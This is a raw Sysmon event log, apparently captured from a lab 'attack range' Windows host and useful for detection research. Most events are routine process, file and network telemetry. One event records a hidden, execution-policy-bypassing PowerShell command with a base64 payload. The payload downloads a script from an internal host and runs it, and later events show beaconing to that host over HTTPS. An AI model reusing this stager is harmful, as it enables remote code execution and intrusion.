SystemMicrosoft CorporationPowerShell.EXEpowershell.exe reed_schmidtC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-A1AF-6140-9F56-04000000C801}6180C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe reed_schmidt 10341000x800000000000000036498139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-A1AF-6140-9F56-04000000C801}6180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498135Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498134Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-A1AF-6140-9F56-04000000C801}6180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.921{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-A1AF-6140-9F56-04000000C801}6180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000036498132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.926{B81B27B7-A1AF-6140-9F56-04000000C801}6180C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c powershell.exe reed_schmidtC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 23542300x800000000000000036498131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.821{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC9E1F47923E51FFADEBBE3251EC87B8,SHA256=FE5ADB2A2521FAB7BD5BB64B484A2B4A88B3686FEE0198B874DB3A972DAFAF6B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:48.281{B81B27B7-A1AF-6140-A056-04000000C801}4176ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498156Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:48.112{B81B27B7-4013-611D-1600-00000000C801}11962844C:\Windows\system32\svchost.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498155Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:48.112{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498154Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:48.066{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498153Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:48.066{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000036498152Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-14 13:20:48.040{B81B27B7-A1AF-6140-A056-04000000C801}4176\PSHost.132760992479341065.4176.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000036498151Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:48.024{B81B27B7-A1AF-6140-A056-04000000C801}4176ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_24lqgowh.mny.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498150Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:48.024{B81B27B7-A1AF-6140-A056-04000000C801}4176ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_zns5sr22.tof.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000036498149Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:47.993{B81B27B7-A1AF-6140-A056-04000000C801}4176C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_zns5sr22.tof.ps12021-09-14 13:20:47.993 354300x800000000000000036498162Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:19.593{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50616-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498161Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:49.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B59ABDBEDB92419DDFA780F278E8FC3B,SHA256=A9ABEE28573DCC8581A136BBA839E901678E9F2E98E3C2D85B933A92F96605A1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498160Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:49.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=026C1B664A94066E155A9EF8CED17C4A,SHA256=8A7F0F0B62A9C4086FC068A10F72D5D6EC7AD883A0665D9213CE332E48BA9B43,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498159Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:49.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7B40905233951A761244F0F2A16F225,SHA256=E39F749F38E63BE227A784AB1BEBB001E46961DE99BEAFF956157AF314F9A41A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498158Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:49.113{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=27B4BD380E236F485FF7535D568EDBBE,SHA256=F8B4BEF327B22FAFF9D68C59412FF59BFE10FD0BFA81FD488E9D8FFC828A023C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498165Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:20.737{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50618-false10.0.1.12-8000- 354300x800000000000000036498164Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:20.202{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50617-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498163Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:50.130{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B780ED28423D5E2B88CF5EC1D37B159,SHA256=CDB98BF5110B4DF48A81DAF605AF3F8E46E12D384FC5D3850FB8F413AE3CCEDC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498166Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:51.164{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E3878AF35E6EBCDA85CFE7DF1C86EA2,SHA256=79CF3B5D3B5394908F614C939ACE251496B425A099F21902D4CD918B00A517D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498167Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:52.228{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5564E74EE1AEF37B3E15B43FEE15372,SHA256=07E5DF964CE97F54E086ADC679C100962E909AD09B2414BEB6A20ADE94B6B2F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498169Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:53.562{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CF7EB97FF471DD01046E2459A3BE54EF,SHA256=E3775103F3425EBBB1771EE1C3CD77B7EEBEB8360096FBECEDE04D091A57746F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498168Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:53.247{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18BBE9CF470AC836B9A98C07BEE579D4,SHA256=1235245EC496098D781E0344C2A815F6F338FF1A7FE85AF93DB35ACA9D21E927,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498171Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:24.218{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50619-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498170Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:54.261{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02742B339C978BEF16FAA7CBAA77A3BB,SHA256=C7DC0344E2F8291DF1B60904EA4338DF060E02558C9A854A36AC40D9E57D7D83,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498172Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:55.291{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95D4D554ED6AB028AC5CF49F632CDC09,SHA256=EB328C4E068098264EE9A796DEC4A1BD1FA0398FBCE8AC6B23478387458E1195,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498173Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:56.305{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0DE089E82417DACF740EEB4FC8DF3CF,SHA256=51E3E0EDDF4B4BC15BC83EDE5048709B127B27065CD11F078501EBD87FFFB58B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498175Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:20:57.323{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=307D44C195BE1A7FE88C50A9AA4F2A2B,SHA256=45F2CF791023105C3129D0A4865B56AD92C1E8B01BABDB5ED03FFB31847765B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498174Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:26.713{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50620-false10.0.1.12-8000- 